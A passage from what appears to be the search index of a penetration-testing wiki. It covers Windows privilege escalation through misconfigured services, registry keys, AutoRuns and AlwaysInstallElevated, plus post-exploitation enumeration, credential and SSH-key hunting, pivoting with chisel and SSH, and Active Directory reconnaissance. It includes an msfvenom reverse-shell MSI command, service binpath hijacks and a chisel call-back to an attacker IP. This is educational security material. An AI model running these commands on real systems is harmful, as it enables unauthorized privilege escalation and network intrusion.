malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry key in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"181","title":"Weak Registry Permissions"},"182":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here , then they may manifest as a possible vulnerability. To identify such services, it is useful to use WinPEAS. It appears that user has write access to the service daclsvc and can also start the service. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem which is an account with more privileges than our user account. If we can write to the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is setup a listener and run the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"182","title":"Insecure Service Permissions"},"183":{"body":"The binary application executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is simply replace the legitimate executable with a malicious one and then start the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"183","title":"Introduction"},"184":{"body":"AutoRun application are programmes which have been set up to automatically execute when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. For example, Steam, Spotify, and Discord, all set this up upon installation. On its own, this does not pose a security risk. Where the real vulnerabilities lies is within AutoRuns which are writable by anyone. AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator would need to log in. Now, as soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"184","title":"Introduction"},"185":{"body":"Windows has a group policy which, when enabled, allows a user to install a Microsoft Windows Installer Package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and execute it with admin privileges. In order to check for this vulnerability, one need only query the following registry keys: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi executable. One way to do this is through Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the executable to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"185","title":"Introduction"},"186":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. One of the first things you should do when seeking for a privilege escalation vector is to look at the kernel version as well as any installed patches and determine if it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching up the kernel version, but a cheat sheet which I like can be found here . Naturally, the exploitation of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"186","title":"Introduction"},"187":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"187","title":"Introduction"},"188":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. UAC, however, has different protection levels which can be configured. Now there are 3 (two of the options are the same but with different aesthetics) options. The first option, and the most strict, is Always Notify. If UAC is set to this, then any programme which tries to run with elevated privileges will beget a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me when application try to make changes to my computer. Under this configuration, regular applications will still cause a UAC prompt to show up whenever run as administrator, however, Windows built-in programmes can be run with elevated privileges without such a prompt. Following is another option which is the exact same as this one, but the UAC prompt will not dim the screen. This is useful for computers for which dimming the screen is not exactly a trifling task. Finally, the Never Notify means that a UAC prompt will never be spawned no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"188","title":"Introduction"},"189":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe . You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"189","title":"Bypassing UAC"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"Windows Startup applications are very similar to AutoRun Programmes , however, they are executed every time a user logs in. If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"190","title":"Introduction"},"191":{"body":"Windows Servers have capabilities to store credentials using a built-in utility called cmdkey . On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas . It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"191","title":"Introduction"},"192":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. The information within an access token identifies the user and their privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token . This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token , to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing , exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits .","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"192","title":"Introduction"},"193":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"193","title":"Post Exploitation"},"194":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"194","title":"Introduction"},"195":{"body":"LinPEAS is an amazing tool for automation enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"195","title":"Linux Enumeration with LinPEAS"},"196":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"196","title":"Finding Files Containing Passwords"},"197":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"197","title":"Finding SSH Keys"},"198":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"198","title":"Introduction"},"199":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"199","title":"Enumerating the Distribution Version"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap that the port is accessible. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version Information","id":"200","title":"Enumerating Linux Kernel Version Information"},"201":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"201","title":"Enumerating CPU Architecture"},"202":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"202","title":"Enumerating Running Services"},"203":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"203","title":"File System Enumeration"},"204":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"204","title":"Enumerate User Name and Group"},"205":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"205","title":"Enumerate Commands Runnable as Root"},"206":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"206","title":"List Users on the Machine"},"207":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"207","title":"Get History of Commands the User Has Run"},"208":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"208","title":"List Network Interfaces and Network Information"},"209":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Open Ports","id":"209","title":"List Open Ports"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"Plenty of automated tools can be found for enumerating Windows machines. They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"210","title":"Introduction"},"211":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"211","title":"Windows Enumeration with WinPEAS"},"212":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"212","title":"Enumerate System Information"},"213":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"213","title":"Enumerate Patches"},"214":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"214","title":"Enumerate Drives"},"215":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exifltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"215","title":"Introduction"},"216":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"216","title":"Introduction"},"217":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will setup a chisel server on Listen Port. On the compromised systenm run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 Remote Host - 0.0.0.0 (server localhost) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 & The above basically translates to \"Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system\".","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"217","title":"Creating a reverse tunnel"},"218":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"218","title":"Introduction"},"219":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"219","title":"Local Port Forwarding"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.” It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send a RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. It is not possible to distinguish an open from a filtered port with these scans, hence why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. Therefore, remote port forwarding is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP when local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"220","title":"Remote Port Forwarding"},"221":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"221","title":"Active Directory (AD)"},"222":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"222","title":"Overview"},"223":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"223","title":"Get Domain Information"},"224":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"224","title":"Get Domain Controller Information"},"225":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"225","title":"Retrieve Domain Policy Information"},"226":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"226","title":"Get Users Information"},"227":{"body":"Get a specific properties of all the users: Get-DomainUser -Properties ,,... It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"227","title":"Get User Property Information"},"228":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"228","title":"Get Domain Machines"},"229":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"229","title":"Get Groups"},"23":{"body":"Doesn't set any flags. Since null scanning does not set any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with certain flags. It is invoked with the -sN option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Null Scan","id":"23","title":"Null Scan"},"230":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"230","title":"Get Group Policy Information"},"231":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"231","title":"Additional Resources"},"232":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a web interface. Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Overview","id":"232","title":"Overview"},"233":{"body":"Install Bloodhound sudo apt install bloodhound Configure neo4j - Bloodhound relies on a different tool called neo4j. It is best to change its default credentials. run neo4j sudo neo4j console open the link it gives you and use the credentials neo4j:neo4j to login change the password","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Setup","id":"233","title":"Setup"},"234":{"body":"Data is obtained through a collector. There are different ones available. You can get SharpHound from the Bloodhound GitHub repo - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1. Start neo4j and bloodhound: sudo neo4j console sudo bloodhound Run the collector on the target machine: powershell -ep bypass . .\\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain -ZipFileName Now, move the files to the attacker machine.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Collecting Data for Bloodhound","id":"234","title":"Collecting Data for Bloodhound"},"235":{"body":"In Bloodhound, on the right you should see a button for Upload Data. Select the previously obtained zip file and wait for Bloodhound to process it. In the top left, click on the three dashes and you should see a summary of the data imported:","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Viewing the Data","id":"235","title":"Viewing the Data"},"236":{"body":"Through the analysis tab, you can see a bunch of pre-made queries. Their names are usually self-describing. Clicking on any of them will generate a particular graph expressing a specific relationship within the AD environment: You are also able to create custom queries.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Data Enumeration with Bloodhound » Finding Relationships in the Data","id":"236","title":"Finding Relationships in the Data"},"237":{"body":"","breadcrumbs":"System Internals","id":"237","title":"System Internals"},"238":{"body":"","breadcrumbs":"System Internals » Linux","id":"238","title":"System Internals"},"239":{"body":"","breadcrumbs":"System Internals » Linux » Processes » User ID","id":"239","title":"User ID"},"24":{"body":"Sets just the FIN bit to on. It is invoked with -sF:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » FIN Scan","id":"24","title":"FIN Scan"},"240":{"body":"Linux uses a unified file system which begins at the / directory (pronounced \"root\", notwithstanding this unfortunate naming). Directory Description / The anchor of the file system. Pronounced \"root\". /root The home directory of the root user. /home The home directories of non-root users are stored here. /usr All system files are stored here - the U nix S ystem R esource. /etc Stores configuration files. /var Stores variable data files such as logs, caches, etc. /opt Any additional software which is not built-in should be installed here. /tmp Temporary data storage. Its contents are erased at every boot or at a certain period. /proc Runtime process information.","breadcrumbs":"System Internals » Linux » File System » Unified File System","id":"240","title":"Unified File System"},"241":{"body":"A symbolic, or soft , link is a reference in the file system to a particular file. When the symbolic link is used in a command, the file which it references will be used instead. Symbolic links between files (or directories for that matter) can be created by using the following command: ln -s It is important to note that when using relative paths for the link, the path is relative to the link (even after it is moved) and not the current working directory. Essentially, when creating a link with a relative path, the link points to ./file. However, if the link is moved, then ./ will refer to a different directory and the link won't be able to find what it is referencing.","breadcrumbs":"System Internals » Linux » File System » Symbolic Links","id":"241","title":"Symbolic Links"},"242":{"body":"Hard links are different from the symbolic links in the sense that they do not have any relationship to the original path where they link to, but only to its contents. They are just files which reference the same data as another file. Hard links are created by using the following syntax: ln Because hard links bear no connection to the path they were created with, they will still point to the same data even after they are relocated.","breadcrumbs":"System Internals » Linux » File System » Hard Links","id":"242","title":"Hard Links"},"243":{"body":"Every file and directory in Linux is owned by a certain user and a group and is assigned three sets of permissions - owner, group, and all users. The owner permissions describe what the user owning the file can do with it, the group permissions describe what members of the group owning the file can do with it, and the all users permissions describe what the rest of the non-root (root is allowed everything) users which are not members of the file's group can do with it. There are 3 possible type of permissions - read (r), write (x) and execute (x). Regarding the file shown here, the permissions are shown on the left and are represented by every 3 characters after the initial dash (-). So, here the file's owner (cr0mll) has rwx permissions on it. Every member of the sysint group will have rw permissions on the file and all other users will only be able to read it.","breadcrumbs":"System Internals » Linux » File System » Permissions","id":"243","title":"Permissions"},"244":{"body":"The Set Owner User ID (SUID) is a special permission which can be set on executable files. When a file with SUID set is executed, it will always run with the effective UID of the user who owns it, irrespective of which user actually passed the command (so long as the user invoking the command also has execute permissions on the file). The SUID permission is indicated by replacing the x in the permissions of the owning user with s. Setting SUID on a file can be done with the following command: chmod u+s Note The SUID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Owner User ID (SUID)","id":"244","title":"Set Owner User ID (SUID)"},"245":{"body":"Similarly to SUID, the Set Group ID (SGID) is a special permission which can be set on both executable files and directories. When set on files, it behaves in the same way SUID but rather than the files executing with the privileges of the owning user, they execute with the effective GID the owning group. When set on a directory, any file created within that directory will automatically have their group ownership set to one specified by the folder. Setting SGID on a file can be done with the following command: chmod g+s Note The SGID permission on scripts is ignored.","breadcrumbs":"System Internals » Linux » File System » Set Group ID (SGID)","id":"245","title":"Set Group ID (SGID)"},"246":{"body":"The sticky bit is a special permission which can be applied to directories in order to limit file deletion within them to the owners of the files. It is denoted by a t in the place of the x permission for the directory and can be set with the following command: chmod +t ","breadcrumbs":"System Internals » Linux » File System » Sticky Bit","id":"246","title":"Sticky Bit"},"247":{"body":"The command line, is a text-based interface which allows for interaction with the computer and execution of commands. The actual command interpreter which carries out the commands is referred to as the shell and there are multiple examples of shells such as bash, zsh, sh, etc.","breadcrumbs":"System Internals » Linux » Command Line » Introduction","id":"247","title":"Introduction"},"248":{"body":"It is possible to redirect input and output from and to files when invoking commands: Redirection Description < in_file Redirect in_file into the command's standard input. > out_file Redirect the command's standard output into out_file by overwriting it. >> out_file Redirect the command's standard output into out_file by appending to it. > err_file Redirect the command's standard error into err_file by overwriting it. >> err_file Redirect the command's standard error into err_file by appending to it.","breadcrumbs":"System Internals » Linux » Command Line » Input and Output Redirection","id":"248","title":"Input and Output Redirection"},"249":{"body":"Moreover, information may be redirected directly from one command to another by using unnamed pipes (|).","breadcrumbs":"System Internals » Linux » Command Line » Pipes","id":"249","title":"Pipes"},"25":{"body":"Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree. It is performed through the -sX option:","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Xmas Scan","id":"25","title":"Xmas Scan"},"250":{"body":"","breadcrumbs":"System Internals » Windows","id":"250","title":"System Internals"},"251":{"body":"Active Directory (AD) is a directory service for Windows network environments. It allows an organisation to store directory data and make it available to the users in a given network. AD has a distributed hierarchical structure that allows for the management of an organisation's resources such as users, computers, groups, network devices, file shares, group policies, servers, workstations and trusts. Furthermore, it provides authentication and authorization functionality to Windows domain environments. Essentially, AD is a large database of information which is accessible to all users within a domain, irrespective of their privilege level. This means that a standard user account can be used to enumerate a large portion of all AD components.","breadcrumbs":"System Internals » Windows » Active Directory (AD) » 